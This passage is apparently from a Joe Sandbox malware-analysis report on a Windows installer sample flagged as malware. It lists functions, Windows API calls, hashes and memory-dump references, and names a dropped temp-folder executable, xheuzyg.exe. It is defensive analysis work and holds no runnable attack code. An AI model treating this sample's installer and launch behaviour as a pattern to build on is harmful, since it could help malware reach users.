Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A

Uniqueness

Uniqueness Score: -1.00%

Function 004053F2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 004053F8
GetLastError.KERNEL32 ref: 00405406

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E

Uniqueness

Uniqueness Score: -1.00%

Function 004030B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 004030E2 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,00014DE4), ref: 004030F0

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404802 Relevance: 67.0, APIs: 33, Strings: 5, Instructions: 478windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404819
GetDlgItem.USER32(?,00000408), ref: 00404826
GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404872
LoadBitmapA.USER32(0000006E), ref: 00404885
SetWindowLongA.USER32(?,000000FC,00404E03), ref: 0040489F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
DeleteObject.GDI32(?), ref: 004048FF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
GetWindowLongA.USER32(?,000000F0), ref: 00404A39
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A47
ShowWindow.USER32(?,00000005), ref: 00404A58
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
ImageList_Destroy.COMCTL32(?), ref: 00404C34
GlobalFree.KERNEL32(?), ref: 00404C44
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
ShowWindow.USER32(?,00000000), ref: 00404DDA
GetDlgItem.USER32(?,000003FE), ref: 00404DE5
ShowWindow.USER32(00000000), ref: 00404DEC

Strings

, xrefs: 00404DC4
N, xrefs: 00404A96
M, xrefs: 004049B2
mo, xrefs: 00404837
I|o, xrefs: 00404D92

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ mo$I|o$M$N
API String ID: 1638840714-2060548473
Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF1 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405050
GetDlgItem.USER32(?,000003EE), ref: 0040505F
GetClientRect.USER32(?,?), ref: 0040509C
GetSystemMetrics.USER32(00000015), ref: 004050A4
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
ShowWindow.USER32(?,00000008), ref: 00405140
GetDlgItem.USER32(?,000003EC), ref: 00405161
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
GetDlgItem.USER32(?,000003F8), ref: 0040506E

Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6

GetDlgItem.USER32(?,000003EC), ref: 004051B3
CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
CloseHandle.KERNEL32(00000000), ref: 004051C8
ShowWindow.USER32(00000000), ref: 004051EC
ShowWindow.USER32(00000000,00000008), ref: 004051F1
ShowWindow.USER32(00000008), ref: 00405238
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
CreatePopupMenu.USER32 ref: 0040527B
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
GetWindowRect.USER32(00000000,?), ref: 004052A3
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
OpenClipboard.USER32(00000000), ref: 00405312
EmptyClipboard.USER32 ref: 00405318
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040532B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
SetClipboardData.USER32(00000001,00000000), ref: 00405362
CloseClipboard.USER32 ref: 00405368

Strings

mo, xrefs: 00405031
{, xrefs: 00405257

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: mo${
API String ID: 590372296-3139121864
Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004042C1 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 273stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404310
SetWindowTextA.USER32(00000000,?), ref: 0040433A
SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
CoTaskMemFree.OLE32(00000000), ref: 004043F6
lstrcmpiA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,0042A0A0), ref: 00404428
lstrcatA.KERNEL32(?,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ), ref: 00404434
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446

Part of subcall function 0040546C: GetDlgItemTextA.USER32(?,?,00000400,0040447D), ref: 0040547F

Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E81
Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E93
Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405EA3

GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F

Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731

Strings

A, xrefs: 004043E4
"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" , xrefs: 00404422, 00404427, 00404432
mo, xrefs: 00404402
I|o, xrefs: 0040457B
C:\Users\user~1\AppData\Local\Temp, xrefs: 00404411

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: mo$"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $A$C:\Users\user~1\AppData\Local\Temp$I|o
API String ID: 2624150263-155280400
Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160

Strings

C:\Users\user~1\AppData\Local\Temp, xrefs: 004020DE

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user~1\AppData\Local\Temp
API String ID: 123533781-3107243751
Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402671 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406354 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00406B2B Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00403FCB Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
GetDlgItem.USER32(00000000,000003E8), ref: 0040406A
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
GetSysColor.USER32(?), ref: 00404099
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
lstrlenA.KERNEL32(?), ref: 004040C1
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
GetDlgItem.USER32(?,0000040A), ref: 00404141
SendMessageA.USER32(00000000), ref: 00404144
GetDlgItem.USER32(?,000003E8), ref: 0040416F
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
LoadCursorA.USER32(00000000,00007F02), ref: 004041BE
SetCursor.USER32(00000000), ref: 004041C7
ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
LoadCursorA.USER32(00000000,00007F00), ref: 004041E7
SetCursor.USER32(00000000), ref: 004041EA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A

Strings

open, xrefs: 004041D2
N, xrefs: 0040415D
"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" , xrefs: 0040419A
mo, xrefs: 0040408A
I|o, xrefs: 00403FEB

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: mo$"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $I|o$N$open
API String ID: 3615053054-2940318611
Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,ylpuxzibyo Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

ylpuxzibyo Setup, xrefs: 00401150
mo, xrefs: 00401039
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

